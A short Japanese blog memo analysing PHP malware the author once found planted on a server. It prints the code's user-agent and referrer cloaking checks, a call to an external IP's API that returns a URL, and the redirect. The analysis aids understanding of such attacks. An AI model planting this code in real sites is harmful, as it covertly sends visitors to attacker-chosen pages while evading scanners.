Conditional Malwareに関するメモ
2014/05/19 (月) 19:35 [Last Edit: 2015/05/19] 
PCの引越しに関連して、昔のファイルを整理していたら、あるサーバーに仕込まれていたMalwareのコードを保管していたのが出てきたのでメモ。
以前の投稿でも仕込まれたマルウェアについて書いたが、今回はまた別のやつ。
(と言っても最近仕込まれたのではなく2012年頃のもの)
その一部を記すと、
if
(
strlen($_SERVER["HTTP_REFERER"]) < 10 ||
!preg_match("/Windows/", $_SERVER["HTTP_USER_AGENT"]) ||
preg_match('/(windows ce)|(Polaris)|(Pocket)|(Dolfin)|(Obigo)|(Alcatel)|(Kindle)|(Motorola)|(Blazer)|(Symbian)|(SonyEricsson)|(Android)|(Palm)|(blackberry)|(Nokia)|(SAMSUNG)|(Mobile)|(Mobi)|(Mini)|(WAP)|(phone)|(iPhone)|(iPad)|(iPod)|(tablet)|(hiptop)|(netfront)|(uZard)|(TeaShark)|(ucweb)|(Tear)|(Skyfire)|(UP\.Browser)|(UPG1)|(Fennec)/i',$_SERVER['HTTP_USER_AGENT']) ||
preg_match('/(java)|(windows 95)|(windows 98)|(windows me)|(win9)|(win 9)|(windows nt 4)|(MSIE 5)/i',$_SERVER['HTTP_USER_AGENT'])
)
{
exit;
}
リファラが短かったり、ボットのアクセスだったりするとexit。
そうじゃない場合は、
$link = @file_get_contents('http://88.198.28.38/api.php?action=link&aid=○○&fid=××××&hash=△△△△△△△△△△△△△△△△△△△△△△');
ここに記載されているIPのAPIにアクセスして、そこでURLを渡され、
header ('Location: ' . $link);
そこへリダイレクト。
若干コードは違うものの、こちらのサイト(英文)で、もうちょっと詳しく説明されている。
結局、Googlebotやアンチウイルス系のソフトに感知されると被害が拡散しないから、普通の人のアクセスの時だけ悪さをしようとしてるってわけですな。
